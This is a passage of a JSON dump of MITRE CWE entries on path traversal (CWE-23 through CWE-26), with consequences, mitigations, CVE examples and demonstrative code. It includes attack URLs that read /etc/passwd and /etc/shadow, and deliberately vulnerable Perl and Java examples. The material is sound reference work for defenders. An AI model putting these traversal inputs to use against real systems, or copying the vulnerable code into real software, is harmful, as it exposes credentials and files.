authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.","Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes \\"..\\" sequences and symbolic links (CWE-23, CWE-59). This includes:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["realpath() in C","getCanonicalPath() in Java","GetFullPath() in ASP.NET","realpath() or abs_path() in Perl","realpath() in PHP"]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following URLs are vulnerable to this attack:","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"http://example.com.br/get-files.jsp?file=report.pdfhttp://example.com.br/get-page.php?home=aaa.htmlhttp://example.com.br/some-page.asp?page=index.html","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"http://example.com.br/get-files?file=../../../../somedir/somefilehttp://example.com.br/../../../../etc/shadowhttp://example.com.br/get-files?file=../../../../etc/passwd","xhtml:br":["",""]}}],"Body_Text":"A simple way to execute this attack is like this:"},{"attr":{"@_Demonstrative_Example_ID":"DX-27"},"Intro_Text":"The following code could be for a social networking application in which each user\'s profile information is stored in a separate file. All files are stored in a single directory.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $dataPath = \\"/users/cwe/profiles\\";my $username = param(\\"user\\");my $profilePath = $dataPath . \\"/\\" . $username;open(my $fh, \\"&lt;$profilePath\\") || ExitError(\\"profile read error: $profilePath\\");print \\"&lt;ul&gt;\\\\n\\";while (&lt;$fh&gt;) {}print \\"&lt;/ul&gt;\\\\n\\";","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"print \\"&lt;li&gt;$_&lt;/li&gt;\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/users/cwe/profiles/../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/etc/passwd"}],"Body_Text":["While the programmer intends to access files such as \\"/users/cwe/profiles/alice\\" or \\"/users/cwe/profiles/bob\\", there is no verification of the incoming user parameter. An attacker could provide a string such as:","The program would generate a profile pathname like this:","When the file is opened, the operating system resolves the \\"../\\" during path canonicalization and actually accesses this file:","As a result, the attacker could read the entire text of the password file.","Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined."]},{"attr":{"@_Demonstrative_Example_ID":"DX-22"},"Intro_Text":"The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form action=\\"FileUploadServlet\\" method=\\"post\\" enctype=\\"multipart/form-data\\"&gt;Choose a file to upload:&lt;input type=\\"file\\" name=\\"filename\\"/&gt;&lt;br/&gt;&lt;input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/&gt;&lt;/form&gt;","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class FileUploadServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"response.setContentType(\\"text/html\\");PrintWriter out = response.getWriter();String contentType = request.getContentType();// the starting position of the boundary headerint ind = contentType.indexOf(\\"boundary=\\");String boundary = contentType.substring(ind+9);String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value// verify that content type is multipart form dataif (contentType != null &amp;&amp; contentType.indexOf(\\"multipart/form-data\\") != -1) {}// output unsuccessful upload response HTML pageelse{...}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf(\\"\\\\\\\\\\"), pLine.lastIndexOf(\\"\\\\\\"\\"));...// output the file to the local upload directorytry {} catch (IOException ex) {...}// output successful upload response HTML page","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {} //end of for loopbw.close();","xhtml:br":["",""],"xhtml:div":{"#text":"if (line.indexOf(boundary) == -1) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bw.write(line);bw.newLine();bw.flush();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}}}}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":["When submitted the Java servlet\'s doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.","This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code.","Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use \\"../\\" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0298","Description":"Server allows remote attackers to cause a denial of service via certain HTTP GET requests containing a %2e%2e (encoded dot-dot), several \\"/../\\" sequences, or several \\"../\\" in a URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0298"},{"Reference":"CVE-2002-0661","Description":"\\"\\\\\\" not in denylist for web server, allowing path traversal attacks when the server is run in Windows and other OSes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661"},{"Reference":"CVE-2002-0946","Description":"Arbitrary files may be read files via ..\\\\ (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0946"},{"Reference":"CVE-2002-1042","Description":"Directory traversal vulnerability in search engine for web server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1042"},{"Reference":"CVE-2002-1209","Description":"Directory traversal vulnerability in FTP server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in a GET request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1209"},{"Reference":"CVE-2002-1178","Description":"Directory traversal vulnerability in servlet allows remote attackers to execute arbitrary commands via \\"..\\\\\\" sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1178"},{"Reference":"CVE-2002-1987","Description":"Protection mechanism checks for \\"/..\\" but doesn\'t account for Windows-specific \\"\\\\..\\" allowing read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987"},{"Reference":"CVE-2005-2142","Description":"Directory traversal vulnerability in FTP server allows remote authenticated attackers to list arbitrary directories via a \\"\\\\..\\" sequence in an LS command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2142"},{"Reference":"CVE-2002-0160","Description":"The administration function in Access Control Server allows remote attackers to read HTML, Java class, and image files outside the web root via a \\"..\\\\..\\" sequence in the URL to port 2002.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0160"},{"Reference":"CVE-2001-0467","Description":"\\"\\\\...\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0467"},{"Reference":"CVE-2001-0963","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0963"},{"Reference":"CVE-2001-1193","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1193"},{"Reference":"CVE-2001-1131","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1131"},{"Reference":"CVE-2001-0480","Description":"read of arbitrary files and directories using GET or CD with \\"...\\" in Windows-based FTP server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0480"},{"Reference":"CVE-2002-0288","Description":"read files using \\".\\" and Unicode-encoded \\"/\\" or \\"\\\\\\" characters in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0288"},{"Reference":"CVE-2003-0313","Description":"Directory listing of web server using \\"...\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0313"},{"Reference":"CVE-2005-1658","Description":"Triple dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1658"},{"Reference":"CVE-2000-0240","Description":"read files via \\"/........../\\" in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0240"},{"Reference":"CVE-2000-0773","Description":"read files via \\"....\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0773"},{"Reference":"CVE-1999-1082","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1082"},{"Reference":"CVE-2004-2121","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121"},{"Reference":"CVE-2001-0491","Description":"multiple attacks using \\"..\\", \\"...\\", and \\"....\\" in different commands","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0491"},{"Reference":"CVE-2001-0615","Description":"\\"...\\" or \\"....\\" in chat server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615"},{"Reference":"CVE-2005-2169","Description":"chain: \\".../...//\\" bypasses protection mechanism using regexp\'s that remove \\"../\\" resulting in collapse into an unsafe value \\"../\\" (CWE-182) and resultant path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2005-0202","Description":"\\".../....///\\" bypasses regexp\'s that remove \\"./\\" and \\"../\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0202"},{"Reference":"CVE-2004-1670","Description":"Mail server allows remote attackers to create arbitrary directories via a \\"..\\" or rename arbitrary files via a \\"....//\\" in user supplied parameters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1670"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Relative Path Traversal"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"139"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-192"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Filenames and Paths&#34;, Page 503"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"24":{"attr":{"@_ID":"24","@_Name":"Path Traversal: \'../filedir\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"../\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \\"../\\" manipulation is the canonical manipulation for operating systems that use \\"/\\" as directory separators, such as UNIX- and Linux-based systems. In some cases, it is useful for bypassing protection schemes in environments for which \\"/\\" is supported but not the primary separator, such as Windows, which uses \\"\\\\\\" but can also accept \\"/\\"."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'../filedir"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Dot Dot Slash - \'../filedir\'","attr":{"@_Date":"2008-04-11"}}}},"25":{"attr":{"@_ID":"25","@_Name":"Path Traversal: \'/../filedir\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"/../\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","Sometimes a program checks for \\"../\\" at the beginning of the input, so a \\"/../\\" can bypass that check."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'/../filedir"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Dot Dot Slash - \'/../filedir\'","attr":{"@_Date":"2008-04-11"}}}},"26":{"attr":{"@_ID":"26","@_Name":"Path Traversal: \'/dir/../filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"/dir/../filename\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'/dir/../filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only checks for \\"../\\" at the beginning of the input, so a \\"/../\\" can bypass that check."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been 